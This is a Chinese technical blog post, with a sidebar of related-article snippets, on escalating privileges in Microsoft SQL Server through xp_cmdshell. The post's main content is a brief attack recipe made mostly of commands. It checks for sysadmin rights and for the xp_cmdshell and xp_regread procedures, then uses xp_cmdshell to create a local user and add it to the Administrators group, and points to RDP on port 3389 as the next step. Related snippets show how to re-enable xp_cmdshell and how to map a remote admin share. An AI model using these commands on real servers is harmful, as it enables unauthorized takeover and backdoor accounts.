[提权禁区] SQL语句利用xp_cmdshell获取权限

最新推荐文章于 2023-09-23 15:24:07 发布
最新推荐文章于 2023-09-23 15:24:07 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: 提权禁区 文章标签: 提权 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21604717/article/details/50989883
版权
判断权限是不是sa

select is_srvrolemember('sysadmin')

返回是1说明是sa



判断xp_cmdshell扩展存储是否存在

select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'

返回为l则证明存在



判断xp_regread扩展存储过程是否存在

select count(*) from master.dbo.sysobjects where name='xp_regread'

返回1证明存在



添加用户

exec master..xp_cmdshell 'net user test test /add'

exec master..xp_cmdshell 'net localgroup administrators test /add'



后来就是查看3389端口了,

exec master..xp_cmdshell 'XXXXX'里面输入cmd命令就是了

文中资料引用:http://www.wooyun.org/bugs/wooyun-2010-037806

听风吟雨落
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
论文研究 - 自旋磁性铁氧体对禁区的影响
05-31
在许多类型的表面附近都观察到了这种禁区,包括人造和天然水凝胶,生物组织以及亲水性聚合物。 古老的研究表明,在存在入射辐射能(尤其是红外光)的情况下,近地表禁区广泛扩展。 电磁生物学和量子生物学的发展...
SQL Server数据库xp_cmdshell提权笔记
最新发布
千寻的博客
06-04 714
SQL Server数据库xp_cmdshell提权
数据库提权,Mssql xp_cmdshell提权
luSaMa的博客
07-06 2109
针对Mssql xp_cmdshell提权的学习实践,SQL Server2008/2012及以前版本基本都能用,但是2016或更高版本部分不能用,或者SA权限太低,导致无法提权。数据库提权的方式也不止有Mssql xp_cmdshell一种,之后更多的提权方式也是我更应该学习的地方。
Windows提权之Mssql(sql server)数据库提权(xp_cmdshell提权)
mrx56的博客
05-18 1161
利用大马或者webshell管理工具登录mssql数据库,执行以下sql命令检查xp_cmdshell是否存在。也可以利用SQL注入。如果xplog70.dll也删除了可以自己上传一个或者执行以下命令恢复。结果为1,则证明存在。当结果为0时,可以通过下列命令恢复。使用xp_cmdshel执行命令。
sql server在使用xp_cmdshell
aisajiang8962的博客
12-01 219
一、sql server在使用xp_cmdshell读取远程服务器上的文件时,要先将远程服务器的目录映射到本地 代码: exec master..xp_cmdshell 'net use P: \\192.0.0.1\c$\psw /user:username' 原来C盘的文件就已经映射到本地的P盘了 转载于:https://www.cnblogs.com/cangowu/p...
caiyue5-(2).zip_caiyue 网_caiyue.2com_caiyue2 com_caiyue2. com
09-14
有人就禁区就会警报并语音提示" 提供了一个安全监控系统的场景,该系统可能使用了激光扫描技术和语音识别技术。 这个场景涉及到几个IT知识点: 1. **物联网(IoT)技术**:火车站台的安全系统很可能是一个物联网应用...
夸克,禁区和广义洛伦兹对称的渐进色狄拉克方程
05-06
通过引入Dirac旋子的12分量颜色泛化,我们建议对夸克的三重态的标准QCD描述进行修改,内置的Z3分级在夸克约束中起着重要的代数作用。 在“颜色狄拉克方程”中,SU(3)颜色对称性与Lorentz对称性的Z3级广义化纠缠在...
工业电子中的利用PSoC的灵活性解决触摸式遥控器设计中的问题
11-29
Apple公司的iPod、LG的巧克力手机的一个共同特点... 传统的电视机遥控器一般都是欧美半导体芯片的禁区,由于量大且设计成熟,里面电子芯片的价格已经杀到几乎无利可图的境地。虽然成本低廉,技术成熟,但也存在产品严
PrivateZone (心灵禁区) v1.3
12-15
PrivateZone(心灵禁区)是一款绿色软件,它可以记录您内心深处不愿告人又害怕遗忘的秘密,软件通过多层次加密技术使数据得到很好的保护,用户密码利用MD5加密,正文利用流加密技术进行多层加密保护,同时可以建立多个...
[WEB安全]MSSQL/SQL Server 提权手法详解
网络安全知识分享
12-17 7232
SQL Server 提权手法详解一、SQL Server 的安装二、SQL Server SA用户的添加三、原理四、xp_cmd提权过程五、OLE提权过程六、xp_regread & xp_regwrite克隆账号 环境:Win10 、SQL Server 2008 一、SQL Server 的安装 介绍: ​ Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。 点击exe后
mssql数据库提权xp_cmdshell使用
Sindy666的博客
08-20 1826
mssql数据库提权xp_cmdshell使用 获得sa密码后蚁剑连接数据库,可用xp_cmdshell执行系统命令 xp, extend procedure, 表示本存储过程是扩展的存储过程 cmdshell, command shell, 直接敲命令行执行 判断是否存在xp_cmdshell select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回1证明存在xp_cmdshell xp_c
SQLMap使用详解
热门推荐
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
SQL注入中利用XP_cmdshell提权的用法
得峰的专栏 [网络收藏]
05-15 2584
先来介绍一下子服务器的基本情况,windows 2000 adv server 中文版,据称打过了sp3,asp+iis+mssql 。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放: FTP (Control)端口80开放: HTTP, World Wide Web端口135开放: Location Service端口139开放: NETBIOS Session Service端口14
Windows提权利用MSSQL数据库,Oracle数据库
qq_61553520的博客
05-30 1558
MSSQL数据库提权总结归纳:MSSQL数据库三种提权方式都是死的:固定得命令执行三种提权方式都是通过web权限查看配置文件的方式获取到MSSQL数据库的账号密码,再进行提权的,MSSQL数据库是默认允许外链的,我们获得sa账户密码后,可以直接远程登录数据库。再数据库的SQL语句执行环境进行提权的。Oracle数据库的利用就很简单,工具梭哈即可。
突破SQLxp_cmdshell恢复终极方法
woshidaniu的专栏
06-17 1413
突破SQLxp_cmdshell恢复终极方法sql server 2005下开启xp_cmdshell的办法以下是引用片段:EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure ’xp_cmdshell’, 1;RECONFIGURE;SQL2005
操作系统权限提升(二十九)之数据库提权-SQL Server xp_cmdshell 提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-23 456
xp_cmdshell可以执行系统命令,该组件默认是关闭的,因此需要把它打开。xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
z2560088的博客
02-13 4256
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。 提权方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取利用wes进行补丁筛选 2.数据库提权 ...
尘白禁区python代码
07-25
以下是一个简单的尘白禁区的 Python 代码示例: ```python import random # 尘白禁区游戏 class DustWhiteGame: def __init__(self, size): self.size = size self.board = [[' ' for _ in range(size)] for _ ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值